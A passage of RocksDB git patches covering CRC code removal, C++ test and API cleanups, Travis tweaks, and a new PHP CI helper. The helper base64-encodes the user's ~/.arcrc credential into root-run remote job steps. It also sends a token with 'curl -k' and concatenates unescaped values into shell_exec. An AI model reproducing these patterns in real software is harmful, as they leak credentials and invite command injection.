mod p(x)`, x^352 mod p(x)`, x^384 mod p(x)` */ - .octa 0x9c25531d19e65ddeec1631edb2dea967 - - /* x^160 mod p(x)`, x^192 mod p(x)`, x^224 mod p(x)`, x^256 mod p(x)` */ - .octa 0x790606ff9957c0a65d27e147510ac59a - - /* x^32 mod p(x)`, x^64 mod p(x)`, x^96 mod p(x)`, x^128 mod p(x)` */ - .octa 0x82f63b786ea2d55ca66805eb18b8ea18 - - .barrett_constants : - /* 33 bit reflected Barrett constant m - (4^32)/n */ - .octa 0x000000000000000000000000dea713f1 /* x^64 div p(x)` */ - /* 33 bit reflected Barrett constant n */ - .octa 0x00000000000000000000000105ec76f1 -#endif - -#endif diff --git a/util/ppc-opcode.h b/util/ppc-opcode.h deleted file mode 100644 index eeb0ae08ffc..00000000000 --- a/util/ppc-opcode.h +++ /dev/null @@ -1,31 +0,0 @@ -// Copyright (c) 2017 International Business Machines Corp. -// All rights reserved. 
-// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. - -#ifndef __OPCODES_H -#define __OPCODES_H - -#define __PPC_RA(a) (((a)&0x1f) << 16) -#define __PPC_RB(b) (((b)&0x1f) << 11) -#define __PPC_XA(a) ((((a)&0x1f) << 16) | (((a)&0x20) >> 3)) -#define __PPC_XB(b) ((((b)&0x1f) << 11) | (((b)&0x20) >> 4)) -#define __PPC_XS(s) ((((s)&0x1f) << 21) | (((s)&0x20) >> 5)) -#define __PPC_XT(s) __PPC_XS(s) -#define VSX_XX3(t, a, b) (__PPC_XT(t) | __PPC_XA(a) | __PPC_XB(b)) -#define VSX_XX1(s, a, b) (__PPC_XS(s) | __PPC_RA(a) | __PPC_RB(b)) - -#define PPC_INST_VPMSUMW 0x10000488 -#define PPC_INST_VPMSUMD 0x100004c8 -#define PPC_INST_MFVSRD 0x7c000066 -#define PPC_INST_MTVSRD 0x7c000166 - -#define VPMSUMW(t, a, b) .long PPC_INST_VPMSUMW | VSX_XX3((t), a, b) -#define VPMSUMD(t, a, b) .long PPC_INST_VPMSUMD | VSX_XX3((t), a, b) -#define MFVRD(a, t) .long PPC_INST_MFVSRD | VSX_XX1((t) + 32, a, 0) -#define MTVRD(t, a) .long PPC_INST_MTVSRD | VSX_XX1((t) + 32, a, 0) - -#endif From 3ce20e985b613134cb2683c0926f986a84974495 Mon Sep 17 00:00:00 2001 From: Andres Suarez Date: Wed, 26 Jul 2017 19:01:45 -0700 Subject: [PATCH 047/205] Fix use of RocksDBCommonHelper in cont_integration.sh Reviewed By: mzlee Differential Revision: D5472936 fbshipit-source-id: cf75858f879f1192b468a9020005634a5afad880 --- build_tools/RocksDBCommonHelper.php | 365 ++++++++++++++++++++++++++++ build_tools/cont_integration.sh | 2 +- 2 files changed, 366 insertions(+), 1 deletion(-) create mode 100644 build_tools/RocksDBCommonHelper.php diff --git a/build_tools/RocksDBCommonHelper.php b/build_tools/RocksDBCommonHelper.php new file mode 100644 index 00000000000..41d1e21738f --- /dev/null +++ b/build_tools/RocksDBCommonHelper.php @@ -0,0 +1,365 @@ + 0); + assert(is_numeric($diffID)); + assert(strlen($url) > 0); + + $cmd = 'echo \'{"diff_id": ' . $diffID . ', ' + . '"name":"click here for sandcastle tests for D' . $diffID . '", ' + . '"link":"' . $url . '"}\' | ' + . 'arc call-conduit ' + . 'differential.updateunitresults'; + shell_exec($cmd); +} + +function buildUpdateTestStatusCmd($diffID, $test, $status) { + assert(strlen($diffID) > 0); + assert(is_numeric($diffID)); + assert(strlen($test) > 0); + assert(strlen($status) > 0); + + $cmd = 'echo \'{"diff_id": ' . $diffID . ', ' + . '"name":"' . $test . '", ' + . '"result":"' . $status . '"}\' | ' + . 'arc call-conduit ' + . 'differential.updateunitresults'; + return $cmd; +} + +function updateTestStatus($diffID, $test) { + assert(strlen($diffID) > 0); + assert(is_numeric($diffID)); + assert(strlen($test) > 0); + + shell_exec(buildUpdateTestStatusCmd($diffID, $test, "waiting")); +} + +function getSteps($applyDiff, $diffID, $username, $test) { + assert(strlen($username) > 0); + assert(strlen($test) > 0); + + if ($applyDiff) { + assert(strlen($diffID) > 0); + assert(is_numeric($diffID)); + + $arcrc_content = (PHP_OS == "Darwin" ? + exec("cat ~/.arcrc | gzip -f | base64") : + exec("cat ~/.arcrc | gzip -f | base64 -w0")); + assert(strlen($arcrc_content) > 0); + + // Sandcastle machines don't have arc setup. We copy the user certificate + // and authenticate using that in Sandcastle. + $setup = array( + "name" => "Setup arcrc", + "shell" => "echo " . $arcrc_content . " | base64 --decode" + . 
" | gzip -d > ~/.arcrc", + "user" => "root" + ); + + // arc demands certain permission on its config. + // also fix the sticky bit issue in sandcastle + $fix_permission = array( + "name" => "Fix environment", + "shell" => "chmod 600 ~/.arcrc && chmod +t /dev/shm", + "user" => "root" + ); + + // Construct the steps in the order of execution. + $steps[] = $setup; + $steps[] = $fix_permission; + } + + // fbcode is a sub-repo. We cannot patch until we add it to ignore otherwise + // Git thinks it is an uncommited change. + $fix_git_ignore = array( + "name" => "Fix git ignore", + "shell" => "echo fbcode >> .git/info/exclude", + "user" => "root" + ); + + // This fixes "FATAL: ThreadSanitizer can not mmap the shadow memory" + // Source: + // https://github.com/google/sanitizers/wiki/ThreadSanitizerCppManual#FAQ + $fix_kernel_issue = array( + "name" => "Fix kernel issue with tsan", + "shell" => "echo 2 >/proc/sys/kernel/randomize_va_space", + "user" => "root" + ); + + $steps[] = $fix_git_ignore; + $steps[] = $fix_kernel_issue; + + // This will be the command used to execute particular type of tests. + $cmd = ""; + + if ($applyDiff) { + // Patch the code (keep your fingures crossed). + $patch = array( + "name" => "Patch " . $diffID, + "shell" => "arc --arcrc-file ~/.arcrc " + . "patch --nocommit --diff " . $diffID, + "user" => "root" + ); + + $steps[] = $patch; + + updateTestStatus($diffID, $test); + $cmd = buildUpdateTestStatusCmd($diffID, $test, "running") . "; "; + } + + // Run the actual command. + $cmd = $cmd . "J=$(nproc) ./build_tools/precommit_checker.py " . $test + . "; exit_code=$?; "; + + if ($applyDiff) { + $cmd = $cmd . "([[ \$exit_code -eq 0 ]] &&" + . buildUpdateTestStatusCmd($diffID, $test, "pass") . ")" + . "||" . buildUpdateTestStatusCmd($diffID, $test, "fail") + . "; "; + } + + // shell command to sort the tests based on exit code and print + // the output of the log files. + $cat_sorted_logs = " + while read code log_file; + do echo \"################ cat \$log_file [exit_code : \$code] ################\"; + cat \$log_file; + done < <(tail -n +2 LOG | sort -k7,7n -k4,4gr | awk '{print \$7,\$NF}')"; + + // Shell command to cat all log files + $cat_all_logs = "for f in `ls t/!(run-*)`; do echo \$f;cat \$f; done"; + + // If LOG file exist use it to cat log files sorted by exit code, otherwise + // cat everything + $logs_cmd = "if [ -f LOG ]; then {$cat_sorted_logs}; else {$cat_all_logs}; fi"; + + $cmd = $cmd . " cat /tmp/precommit-check.log" + . "; shopt -s extglob; {$logs_cmd}" + . "; shopt -u extglob; [[ \$exit_code -eq 0 ]]"; + assert(strlen($cmd) > 0); + + $run_test = array( + "name" => "Run " . $test, + "shell" => $cmd, + "user" => "root", + "parser" => "python build_tools/error_filter.py " . $test, + ); + + $steps[] = $run_test; + + if ($applyDiff) { + // Clean up the user arc config we are using. + $cleanup = array( + "name" => "Arc cleanup", + "shell" => "rm -f ~/.arcrc", + "user" => "root" + ); + + $steps[] = $cleanup; + } + + assert(count($steps) > 0); + return $steps; +} + +function getSandcastleConfig() { + $sandcastle_config = array(); + + $cwd = getcwd(); + $cwd_token_file = "{$cwd}/.sandcastle"; + // This is a case when we're executed from a continuous run. Fetch the values + // from the environment. + if (getenv(ENV_POST_RECEIVE_HOOK)) { + $sandcastle_config[0] = getenv(ENV_HTTPS_APP_VALUE); + $sandcastle_config[1] = getenv(ENV_HTTPS_TOKEN_VALUE); + } else { + // This is a typical `[p]arc diff` case. Fetch the values from the specific + // configuration files. 
+    for ($i = 0; $i < 50; $i++) {
+      if (file_exists(PRIMARY_TOKEN_FILE) ||
+          file_exists($cwd_token_file)) {
+        break;
+      }
+      // If we failed to fetch the tokens, sleep for 0.2 seconds and try again.
+      usleep(200000);
+    }
+    assert(file_exists(PRIMARY_TOKEN_FILE) ||
+           file_exists($cwd_token_file));
+
+    // Try the primary location first, followed by a secondary.
+    if (file_exists(PRIMARY_TOKEN_FILE)) {
+      $cmd = 'cat ' . PRIMARY_TOKEN_FILE;
+    } else {
+      $cmd = 'cat ' . $cwd_token_file;
+    }
+
+    assert(strlen($cmd) > 0);
+    $sandcastle_config = explode(':', rtrim(shell_exec($cmd)));
+  }
+
+  // In this case, be very explicit about the implications.
+  if (count($sandcastle_config) != 2) {
+    echo "Sandcastle configuration files don't contain valid information " .
+         "or the necessary environment variables aren't defined. Unable " .
+         "to validate the code changes.";
+    exit(1);
+  }
+
+  assert(strlen($sandcastle_config[0]) > 0);
+  assert(strlen($sandcastle_config[1]) > 0);
+  assert(count($sandcastle_config) > 0);
+
+  return $sandcastle_config;
+}
+
+// This function can be called either from the `[p]arc diff` command or during
+// the Git post-receive hook.
+function startTestsInSandcastle($applyDiff, $workflow, $diffID) {
+  // Default options don't terminate on failure, but that's what we want. In
+  // the current case we use assertions intentionally as "terminate on failure
+  // invariants".
+  assert_options(ASSERT_BAIL, true);
+
+  // In case of a diff we'll send notifications to the author. Else it'll go to
+  // the entire team because failures indicate that build quality has regressed.
+  $username = $applyDiff ? exec("whoami") : CONT_RUN_ALIAS;
+  assert(strlen($username) > 0);
+
+  if ($applyDiff) {
+    assert($workflow);
+    assert(strlen($diffID) > 0);
+    assert(is_numeric($diffID));
+  }
+
+  // List of tests we want to run in Sandcastle.
+  $tests = array("unit", "unit_non_shm", "unit_481", "clang_unit", "tsan",
+                 "asan", "lite_test", "valgrind", "release", "release_481",
+                 "clang_release", "clang_analyze", "code_cov",
+                 "java_build", "no_compression", "unity", "ubsan");
+
+  $send_email_template = array(
+    'type' => 'email',
+    'triggers' => array('fail'),
+    'emails' => array($username . '@fb.com'),
+  );
+
+  // Construct a job definition for each test and add it to the master plan.
+  foreach ($tests as $test) {
+    $stepName = "RocksDB diff " . $diffID . " test " . $test;
+
+    if (!$applyDiff) {
+      $stepName = "RocksDB continuous integration test " . $test;
+    }
+
+    $arg[] = array(
+      "name" => $stepName,
+      "report" => array($send_email_template),
+      "steps" => getSteps($applyDiff, $diffID, $username, $test)
+    );
+  }
+
+  // We cannot submit the parallel execution master plan to Sandcastle and
+  // need to supply the job plan as a determinator. So we construct a small job
+  // that will spit out the master job plan which Sandcastle will parse and
+  // execute. Why compress the job definitions? Otherwise we run over the max
+  // string size.
+  $cmd = "echo " . base64_encode(json_encode($arg))
+         . (PHP_OS == "Darwin" ?
+            " | gzip -f | base64" :
+            " | gzip -f | base64 -w0");
+  assert(strlen($cmd) > 0);
+
+  $arg_encoded = shell_exec($cmd);
+  assert(strlen($arg_encoded) > 0);
+
+  $runName = "Run diff " . $diffID . " for user " . $username;
+
+  if (!$applyDiff) {
+    $runName = "RocksDB continuous integration build and test run";
+  }
+
+  $command = array(
+    "name" => $runName,
+    "steps" => array()
+  );
+
+  $command["steps"][] = array(
+    "name" => "Generate determinator",
+    "shell" => "echo " . $arg_encoded .
" | base64 --decode | gzip -d" + . " | base64 --decode", + "determinator" => true, + "user" => "root" + ); + + // Submit to Sandcastle. + $url = 'https://interngraph.intern.facebook.com/sandcastle/create'; + + $job = array( + 'command' => 'SandcastleUniversalCommand', + 'args' => $command, + 'capabilities' => array( + 'vcs' => 'rocksdb-int-git', + 'type' => 'lego', + ), + 'hash' => 'origin/master', + 'user' => $username, + 'alias' => 'rocksdb-precommit', + 'tags' => array('rocksdb'), + 'description' => 'Rocksdb precommit job', + ); + + // Fetch the configuration necessary to submit a successful HTTPS request. + $sandcastle_config = getSandcastleConfig(); + + $app = $sandcastle_config[0]; + $token = $sandcastle_config[1]; + + $cmd = 'curl -s -k -F app=' . $app . ' ' + . '-F token=' . $token . ' -F job=\'' . json_encode($job) + .'\' "' . $url . '"'; + + $output = shell_exec($cmd); + assert(strlen($output) > 0); + + // Extract Sandcastle URL from the response. + preg_match('/url": "(.+)"/', $output, $sandcastle_url); + + assert(count($sandcastle_url) > 0, "Unable to submit Sandcastle request."); + assert(strlen($sandcastle_url[1]) > 0, "Unable to extract Sandcastle URL."); + + if ($applyDiff) { + echo "\nSandcastle URL: " . $sandcastle_url[1] . "\n"; + // Ask Phabricator to display it on the diff UI. + postURL($diffID, $sandcastle_url[1]); + } else { + echo "Continuous integration started Sandcastle tests. You can look at "; + echo "the progress at:\n" . $sandcastle_url[1] . "\n"; + } +} + +// Continuous run cript will set the environment variable and based on that +// we'll trigger the execution of tests in Sandcastle. In that case we don't +// need to apply any diffs and there's no associated workflow either. +if (getenv(ENV_POST_RECEIVE_HOOK)) { + startTestsInSandcastle( + false /* $applyDiff */, + NULL /* $workflow */, + NULL /* $diffID */); +} diff --git a/build_tools/cont_integration.sh b/build_tools/cont_integration.sh index 9d0f7766a2c..4e1905e7e31 100755 --- a/build_tools/cont_integration.sh +++ b/build_tools/cont_integration.sh @@ -67,7 +67,7 @@ function update_repo_status { # # Path to the determinator from the root of the RocksDB repo. -CONTRUN_DETERMINATOR=./arcanist_util/config/RocksDBCommonHelper.php +CONTRUN_DETERMINATOR=./build_tools/RocksDBCommonHelper.php # Value of the previous commit. 
PREV_COMMIT= From e7697b8ce82bf48be4aac168303aebd1c2f61419 Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Wed, 26 Jul 2017 21:02:53 -0700 Subject: [PATCH 048/205] Fix LITE unit tests Summary: Closes https://github.com/facebook/rocksdb/pull/2649 Differential Revision: D5505778 Pulled By: siying fbshipit-source-id: 7e935603ede3d958ea087ed6b8cfc4121e8797bc --- db/db_io_failure_test.cc | 2 +- db/db_test2.cc | 3 ++- db/db_test_util.cc | 17 ++++++++++++++--- util/file_reader_writer_test.cc | 8 +++++++- 4 files changed, 24 insertions(+), 6 deletions(-) diff --git a/db/db_io_failure_test.cc b/db/db_io_failure_test.cc index e93961c13d0..9f4dcc5d056 100644 --- a/db/db_io_failure_test.cc +++ b/db/db_io_failure_test.cc @@ -204,7 +204,6 @@ TEST_F(DBIOFailureTest, ManifestWriteError) { ASSERT_EQ("bar2", Get("foo2")); } } -#endif // ROCKSDB_LITE TEST_F(DBIOFailureTest, PutFailsParanoid) { // Test the following: @@ -559,6 +558,7 @@ TEST_F(DBIOFailureTest, CompactionSstSyncError) { ASSERT_EQ("bar3", Get(1, "foo")); } #endif // !(defined NDEBUG) || !defined(OS_WIN) +#endif // ROCKSDB_LITE } // namespace rocksdb int main(int argc, char** argv) { diff --git a/db/db_test2.cc b/db/db_test2.cc index aa10789c851..ca8986c4d8d 100644 --- a/db/db_test2.cc +++ b/db/db_test2.cc @@ -2236,6 +2236,7 @@ TEST_F(DBTest2, LowPriWrite) { ASSERT_EQ(1, rate_limit_count.load()); } +#ifndef ROCKSDB_LITE TEST_F(DBTest2, RateLimitedCompactionReads) { // compaction input has 512KB data const int kNumKeysPerFile = 128; @@ -2299,7 +2300,7 @@ TEST_F(DBTest2, RateLimitedCompactionReads) { options.rate_limiter->GetTotalBytesThrough(Env::IO_LOW))); } } - +#endif // ROCKSDB_LITE } // namespace rocksdb int main(int argc, char** argv) { diff --git a/db/db_test_util.cc b/db/db_test_util.cc index 5ca4b19a253..c4d465ba117 100644 --- a/db/db_test_util.cc +++ b/db/db_test_util.cc @@ -42,13 +42,24 @@ SpecialEnv::SpecialEnv(Env* base) non_writable_count_ = 0; table_write_callback_ = nullptr; } - +#ifndef ROCKSDB_LITE ROT13BlockCipher rot13Cipher_(16); +#endif // ROCKSDB_LITE DBTestBase::DBTestBase(const std::string path) : mem_env_(!getenv("MEM_ENV") ? nullptr : new MockEnv(Env::Default())), - encrypted_env_(!getenv("ENCRYPTED_ENV") ? nullptr : NewEncryptedEnv(mem_env_ ? mem_env_ : Env::Default(), new CTREncryptionProvider(rot13Cipher_))), - env_(new SpecialEnv(encrypted_env_ ? encrypted_env_ : (mem_env_ ? mem_env_ : Env::Default()))), +#ifndef ROCKSDB_LITE + encrypted_env_( + !getenv("ENCRYPTED_ENV") + ? nullptr + : NewEncryptedEnv(mem_env_ ? mem_env_ : Env::Default(), + new CTREncryptionProvider(rot13Cipher_))), +#else + encrypted_env_(nullptr), +#endif // ROCKSDB_LITE + env_(new SpecialEnv(encrypted_env_ + ? encrypted_env_ + : (mem_env_ ? mem_env_ : Env::Default()))), option_config_(kDefault) { env_->SetBackgroundThreads(1, Env::LOW); env_->SetBackgroundThreads(1, Env::HIGH); diff --git a/util/file_reader_writer_test.cc b/util/file_reader_writer_test.cc index dac5182452b..45675e9dd76 100644 --- a/util/file_reader_writer_test.cc +++ b/util/file_reader_writer_test.cc @@ -143,7 +143,13 @@ TEST_F(WritableFileWriterTest, IncrementalBuffer) { env_options.writable_file_max_buffer_size = (attempt < kNumAttempts / 2) ? 
512 * 1024 : 700 * 1024;
   std::string actual;
-  unique_ptr<FakeWF> wf(new FakeWF(&actual, attempt % 2 == 1, no_flush));
+  unique_ptr<FakeWF> wf(new FakeWF(&actual,
+#ifndef ROCKSDB_LITE
+                                   attempt % 2 == 1,
+#else
+                                   false,
+#endif
+                                   no_flush));
   unique_ptr<WritableFileWriter> writer(
       new WritableFileWriter(std::move(wf), env_options));

From f33f1136831e01232f532439628359f72188e419 Mon Sep 17 00:00:00 2001
From: Andrew Kryczka
Date: Thu, 27 Jul 2017 12:10:41 -0700
Subject: [PATCH 049/205] fix db_bench argument type

Summary:
it should be a bool
Closes https://github.com/facebook/rocksdb/pull/2653

Differential Revision: D5506148

Pulled By: ajkr

fbshipit-source-id: f142f0f3aa8b678c68adef12e5ac6e1e163306f3
---
 tools/db_bench_tool.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/tools/db_bench_tool.cc b/tools/db_bench_tool.cc
index 0cc424eeab2..d10758f04ab 100644
--- a/tools/db_bench_tool.cc
+++ b/tools/db_bench_tool.cc
@@ -434,7 +434,7 @@ DEFINE_int32(file_opening_threads, rocksdb::Options().max_file_opening_threads,
             "If open_files is set to -1, this option set the number of "
             "threads that will be used to open files during DB::Open()");
 
-DEFINE_int32(new_table_reader_for_compaction_inputs, true,
+DEFINE_bool(new_table_reader_for_compaction_inputs, true,
             "If true, uses a separate file handle for compaction inputs");
 
 DEFINE_int32(compaction_readahead_size, 0, "Compaction readahead size");

From d12691b86fb788f0ee7180db626c4ea2445fa976 Mon Sep 17 00:00:00 2001
From: Andrew Kryczka
Date: Thu, 27 Jul 2017 12:10:49 -0700
Subject: [PATCH 050/205] move TableCache::EraseHandle outside of db mutex

Summary:
Post-compaction work holds onto the db mutex for the longest time (found by
tracing lock acquires/releases with LTTng and correlating timestamps with our
info log). Further experimentation showed `TableCache::EraseHandle` is
responsible for ~86% of the time the mutex is held. We can just release the
handle outside the db mutex.
Closes https://github.com/facebook/rocksdb/pull/2654

Differential Revision: D5507126

Pulled By: ajkr

fbshipit-source-id: 703c01ddf2aea16bc0f9e33c08935d78aa6b781d
---
 db/db_impl_files.cc | 3 +++
 db/version_set.cc   | 4 ----
 2 files changed, 3 insertions(+), 4 deletions(-)

diff --git a/db/db_impl_files.cc b/db/db_impl_files.cc
index 3bbf94c293b..e44e4231895 100644
--- a/db/db_impl_files.cc
+++ b/db/db_impl_files.cc
@@ -368,6 +368,9 @@ void DBImpl::PurgeObsoleteFiles(const JobContext& state, bool schedule_only) {
       candidate_files.emplace_back(
           MakeTableFileName(kDumbDbName, file->fd.GetNumber()),
           file->fd.GetPathId());
+      if (file->table_reader_handle) {
+        table_cache_->Release(file->table_reader_handle);
+      }
       delete file;
     }
 
diff --git a/db/version_set.cc b/db/version_set.cc
index 0069d86c1dd..ffbdd46cd1a 100644
--- a/db/version_set.cc
+++ b/db/version_set.cc
@@ -328,10 +328,6 @@ Version::~Version() {
       assert(f->refs > 0);
       f->refs--;
       if (f->refs <= 0) {
-        if (f->table_reader_handle) {
-          cfd_->table_cache()->EraseHandle(f->fd, f->table_reader_handle);
-          f->table_reader_handle = nullptr;
-        }
         vset_->obsolete_files_.push_back(f);
       }
     }

From 7f6d012d70ec540f0726cd3fe38ad1d3d723396c Mon Sep 17 00:00:00 2001
From: Siying Dong
Date: Thu, 27 Jul 2017 13:35:39 -0700
Subject: [PATCH 051/205] "ccache -C" in Travis

Summary:
This is to work around the following build error:

    util/threadpool_imp.o: file not recognized: File truncated

Just to make the build go through. We should remove it later if we find the
real long-term solution.
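For illustration only, the workaround amounts to wiping the compiler cache by
hand before building (a minimal sketch, assuming ccache is installed and on
PATH; the make invocation mirrors the Travis script below):

    ccache -C    # drop every cached object, including any truncated ones
    ccache -s    # optional: show cache statistics to confirm it is empty
    OPT=-DTRAVIS V=1 make -j4 all

The cost is that each such build starts from a cold cache, which is why this
is treated as a stopgap rather than a long-term fix.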
Closes https://github.com/facebook/rocksdb/pull/2657 Differential Revision: D5511034 Pulled By: siying fbshipit-source-id: 229f024bd78ee96799017d4a89be74253058ec30 --- .travis.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.travis.yml b/.travis.yml index 7e2bf115c3f..887fbfc2f18 100644 --- a/.travis.yml +++ b/.travis.yml @@ -57,7 +57,7 @@ before_script: script: - ${CXX} --version - - if [ "${TEST_GROUP}" == 'platform_dependent' ]; then OPT=-DTRAVIS V=1 make -j4 all; OPT=-DTRAVIS V=1 ROCKSDBTESTS_END=db_block_cache_test make -j4 check_some; fi + - if [ "${TEST_GROUP}" == 'platform_dependent' ]; then ccache -C && OPT=-DTRAVIS V=1 make -j4 all && OPT=-DTRAVIS V=1 ROCKSDBTESTS_END=db_block_cache_test make -j4 check_some; fi - if [ "${TEST_GROUP}" == '1' ]; then OPT=-DTRAVIS V=1 ROCKSDBTESTS_START=db_block_cache_test ROCKSDBTESTS_END=comparator_db_test make -j4 check_some; fi - if [ "${TEST_GROUP}" == '2' ]; then OPT=-DTRAVIS V=1 ROCKSDBTESTS_START=comparator_db_test make -j4 check_some; fi - if [ "${JOB_NAME}" == 'java_test' ]; then OPT=-DTRAVIS V=1 make clean jclean && make rocksdbjava jtest; fi From 8f553d3c524bd2529613e9217020942006a9df63 Mon Sep 17 00:00:00 2001 From: Aaron Gao Date: Thu, 27 Jul 2017 14:17:10 -0700 Subject: [PATCH 052/205] remove unnecessary internal_comparator param in newIterator Summary: solved https://github.com/facebook/rocksdb/issues/2604 Closes https://github.com/facebook/rocksdb/pull/2648 Differential Revision: D5504875 Pulled By: lightmark fbshipit-source-id: c14bb62ccbdc9e7bda9cd914cae4ea0765d882ee --- db/table_cache.cc | 3 +-- table/block_based_table_reader.cc | 9 +++++---- table/block_based_table_reader.h | 1 - table/cuckoo_table_reader.cc | 3 +-- table/cuckoo_table_reader.h | 1 - table/mock_table.cc | 1 - table/mock_table.h | 1 - table/plain_table_reader.cc | 1 - table/plain_table_reader.h | 3 +-- table/table_reader.h | 1 - 10 files changed, 8 insertions(+), 16 deletions(-) diff --git a/db/table_cache.cc b/db/table_cache.cc index 4dc56935fbc..a1a03d3bed7 100644 --- a/db/table_cache.cc +++ b/db/table_cache.cc @@ -225,8 +225,7 @@ InternalIterator* TableCache::NewIterator( } InternalIterator* result = nullptr; if (s.ok()) { - result = - table_reader->NewIterator(options, arena, &icomparator, skip_filters); + result = table_reader->NewIterator(options, arena, skip_filters); if (create_new_table_reader) { assert(handle == nullptr); result->RegisterCleanup(&DeleteTableReader, table_reader, nullptr); diff --git a/table/block_based_table_reader.cc b/table/block_based_table_reader.cc index 123e1814ab7..3c4f0b80ee5 100644 --- a/table/block_based_table_reader.cc +++ b/table/block_based_table_reader.cc @@ -1545,11 +1545,12 @@ bool BlockBasedTable::PrefixMayMatch(const Slice& internal_key) { return may_match; } -InternalIterator* BlockBasedTable::NewIterator( - const ReadOptions& read_options, Arena* arena, - const InternalKeyComparator* icomp, bool skip_filters) { +InternalIterator* BlockBasedTable::NewIterator(const ReadOptions& read_options, + Arena* arena, + bool skip_filters) { return NewTwoLevelIterator( - new BlockEntryIteratorState(this, read_options, icomp, skip_filters), + new BlockEntryIteratorState(this, read_options, + &rep_->internal_comparator, skip_filters), NewIndexIterator(read_options), arena); } diff --git a/table/block_based_table_reader.h b/table/block_based_table_reader.h index 857ea56057b..8b3494ef56f 100644 --- a/table/block_based_table_reader.h +++ b/table/block_based_table_reader.h @@ -102,7 +102,6 @@ class BlockBasedTable 
: public TableReader { // @param skip_filters Disables loading/accessing the filter block InternalIterator* NewIterator( const ReadOptions&, Arena* arena = nullptr, - const InternalKeyComparator* icomparator = nullptr, bool skip_filters = false) override; InternalIterator* NewRangeTombstoneIterator( diff --git a/table/cuckoo_table_reader.cc b/table/cuckoo_table_reader.cc index 85670ad1daf..9cecebaebb7 100644 --- a/table/cuckoo_table_reader.cc +++ b/table/cuckoo_table_reader.cc @@ -364,8 +364,7 @@ extern InternalIterator* NewErrorInternalIterator(const Status& status, Arena* arena); InternalIterator* CuckooTableReader::NewIterator( - const ReadOptions& read_options, Arena* arena, - const InternalKeyComparator* icomp, bool skip_filters) { + const ReadOptions& read_options, Arena* arena, bool skip_filters) { if (!status().ok()) { return NewErrorInternalIterator( Status::Corruption("CuckooTableReader status is not okay."), arena); diff --git a/table/cuckoo_table_reader.h b/table/cuckoo_table_reader.h index f2b6d1a9cfe..4beac8f9d07 100644 --- a/table/cuckoo_table_reader.h +++ b/table/cuckoo_table_reader.h @@ -47,7 +47,6 @@ class CuckooTableReader: public TableReader { InternalIterator* NewIterator( const ReadOptions&, Arena* arena = nullptr, - const InternalKeyComparator* icomparator = nullptr, bool skip_filters = false) override; void Prepare(const Slice& target) override; diff --git a/table/mock_table.cc b/table/mock_table.cc index 4c9907e4599..86c380865c6 100644 --- a/table/mock_table.cc +++ b/table/mock_table.cc @@ -28,7 +28,6 @@ stl_wrappers::KVMap MakeMockFile( InternalIterator* MockTableReader::NewIterator(const ReadOptions&, Arena* arena, - const InternalKeyComparator*, bool skip_filters) { return new MockTableIterator(table_); } diff --git a/table/mock_table.h b/table/mock_table.h index 9e5396341c5..71609a173fb 100644 --- a/table/mock_table.h +++ b/table/mock_table.h @@ -40,7 +40,6 @@ class MockTableReader : public TableReader { InternalIterator* NewIterator(const ReadOptions&, Arena* arena, - const InternalKeyComparator* = nullptr, bool skip_filters = false) override; Status Get(const ReadOptions&, const Slice& key, GetContext* get_context, diff --git a/table/plain_table_reader.cc b/table/plain_table_reader.cc index 0f9449e8669..92933b34ba1 100644 --- a/table/plain_table_reader.cc +++ b/table/plain_table_reader.cc @@ -191,7 +191,6 @@ void PlainTableReader::SetupForCompaction() { InternalIterator* PlainTableReader::NewIterator(const ReadOptions& options, Arena* arena, - const InternalKeyComparator*, bool skip_filters) { bool use_prefix_seek = !IsTotalOrderMode() && !options.total_order_seek; if (arena == nullptr) { diff --git a/table/plain_table_reader.h b/table/plain_table_reader.h index 236bab4fd52..6bf8da2f988 100644 --- a/table/plain_table_reader.h +++ b/table/plain_table_reader.h @@ -71,7 +71,7 @@ class PlainTableReader: public TableReader { public: static Status Open(const ImmutableCFOptions& ioptions, const EnvOptions& env_options, - const InternalKeyComparator& icomparator, + const InternalKeyComparator& internal_comparator, unique_ptr&& file, uint64_t file_size, unique_ptr* table, const int bloom_bits_per_key, double hash_table_ratio, @@ -80,7 +80,6 @@ class PlainTableReader: public TableReader { InternalIterator* NewIterator(const ReadOptions&, Arena* arena = nullptr, - const InternalKeyComparator* = nullptr, bool skip_filters = false) override; void Prepare(const Slice& target) override; diff --git a/table/table_reader.h b/table/table_reader.h index 5f47468e6de..9681d54670e 
100644
--- a/table/table_reader.h
+++ b/table/table_reader.h
@@ -40,7 +40,6 @@ class TableReader {
   // option is effective only for block-based table format.
   virtual InternalIterator* NewIterator(const ReadOptions&,
                                         Arena* arena = nullptr,
-                                        const InternalKeyComparator* = nullptr,
                                         bool skip_filters = false) = 0;
 
   virtual InternalIterator* NewRangeTombstoneIterator(

From fca4d6da175f0a77e5f77ae439c69ab5208e229a Mon Sep 17 00:00:00 2001
From: Siying Dong
Date: Thu, 27 Jul 2017 17:15:48 -0700
Subject: [PATCH 053/205] Build fewer tests in Travis platform_dependent tests

Summary:
platform_dependent tests in Travis now build all tests, which is not needed.
Only build those tests we need to run.
Closes https://github.com/facebook/rocksdb/pull/2647

Differential Revision: D5513954

Pulled By: siying

fbshipit-source-id: 4d540b146124e70dd25586c47939d19f93655b0a
---
 .travis.yml         | 2 +-
 Makefile            | 2 ++
 db/db_basic_test.cc | 2 ++
 3 files changed, 5 insertions(+), 1 deletion(-)

diff --git a/.travis.yml b/.travis.yml
index 887fbfc2f18..78e51915943 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -57,7 +57,7 @@ before_script:
 
 script:
   - ${CXX} --version
-  - if [ "${TEST_GROUP}" == 'platform_dependent' ]; then ccache -C && OPT=-DTRAVIS V=1 make -j4 all && OPT=-DTRAVIS V=1 ROCKSDBTESTS_END=db_block_cache_test make -j4 check_some; fi
+  - if [ "${TEST_GROUP}" == 'platform_dependent' ]; then ccache -C && OPT=-DTRAVIS V=1 ROCKSDBTESTS_END=db_block_cache_test make -j4 all_but_some_tests check_some; fi
   - if [ "${TEST_GROUP}" == '1' ]; then OPT=-DTRAVIS V=1 ROCKSDBTESTS_START=db_block_cache_test ROCKSDBTESTS_END=comparator_db_test make -j4 check_some; fi
   - if [ "${TEST_GROUP}" == '2' ]; then OPT=-DTRAVIS V=1 ROCKSDBTESTS_START=comparator_db_test make -j4 check_some; fi
